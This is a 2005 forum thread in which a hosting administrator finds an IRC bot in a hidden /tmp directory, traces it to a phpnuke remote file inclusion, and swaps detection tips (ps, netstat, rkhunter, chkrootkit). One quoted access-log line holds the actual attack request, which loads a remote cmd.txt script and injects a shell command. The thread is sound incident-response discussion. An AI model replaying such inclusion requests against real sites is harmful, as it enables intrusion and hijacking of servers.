|
|
| Mark D Smith 2005-09-06, 5:52 pm |
| Hi
a customer is running an IRC program. i am having problems finding who as
the files install under /tmp/.X11_unix/.unix with UID/GID apache
This is on FC3
Google does not bring up much and apart from firewalling ports 666x to 6669
and killing the daemon. any pointers welcomed.
Mark
| |
|
| Mark D Smith wrote:
> Hi
>
> a customer is running an IRC program. i am having problems finding who as
> the files install under /tmp/.X11_unix/.unix with UID/GID apache
>
> This is on FC3
>
> Google does not bring up much and apart from firewalling ports 666x to 6669
> and killing the daemon. any pointers welcomed.
>
> Mark
>
....if it's a customer, grep /var/html/www or /home/*/public_html for
'irc' and see what it brings up. You can use lsof to see what's opening
those files, or use ps to keep an eye on what processes are active.
....if it's *not* a customer... Doh!
| |
| Mark D Smith 2005-09-08, 5:48 pm |
|
"Jake" <NoSpamForMe@here.tld> wrote in message
news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> Mark D Smith wrote:
as[vbcol=seagreen]
6669[vbcol=seagreen]
>
>
> ...if it's a customer, grep /var/html/www or /home/*/public_html for
> 'irc' and see what it brings up. You can use lsof to see what's opening
> those files, or use ps to keep an eye on what processes are active.
>
> ...if it's *not* a customer... Doh!
>
>
It looks like another issue with phpnuke. found this in an access_log of a
customer
/home/domain/domain110/logs/access_log:200.32.121.22 - -
[03/Sep/2005:08:44:34 +0100] "GET
/phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/j
mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
along with a host of other refs to .X11_unix
needless to say with disabled the customers phpnuke and informed them to
contact the authors for a patch or newer version.
Mark
| |
|
| Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:5rWTe.15065$I02.892219@news20.bellglobal.com...
>
>
> as
>
>
> 6669
>
>
> It looks like another issue with phpnuke. found this in an access_log of a
> customer
>
> /home/domain/domain110/logs/access_log:200.32.121.22 - -
> [03/Sep/2005:08:44:34 +0100] "GET
> /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/j
> mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>
> along with a host of other refs to .X11_unix
>
> needless to say with disabled the customers phpnuke and informed them to
> contact the authors for a patch or newer version.
>
> Mark
>
That'll do it. Mind if I ask how you discovered the intrusion?
| |
| Mark D Smith 2005-09-08, 5:48 pm |
|
"Jake" <NoSpamForMe@here.tld> wrote in message
news:wNZTe.16121$I02.925006@news20.bellglobal.com...
<snip>
> That'll do it. Mind if I ask how you discovered the intrusion?
routine check of /tmp dir for hidden files found .X11_unix dir which i did
not know what it was. looked at the files and found the dreaded irc
mentioned google found nothing of much help.
used ps and netstat to find what was running, killed and removed the files.
post checked with rkhunter and all looks clean.
Mark
| |
|
| Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:wNZTe.16121$I02.925006@news20.bellglobal.com...
> <snip>
>
>
>
> routine check of /tmp dir for hidden files found .X11_unix dir which i did
> not know what it was. looked at the files and found the dreaded irc
> mentioned google found nothing of much help.
>
> used ps and netstat to find what was running, killed and removed the files.
>
> post checked with rkhunter and all looks clean.
>
> Mark
>
rkhunter is a great tool. I use it in conjunction with chkrootkit and
tripwire. Makes for a lot of logs every morning but at least I know
what's going on. Most of the time anyway, nothing's ever 100%. :\
|
|
|
|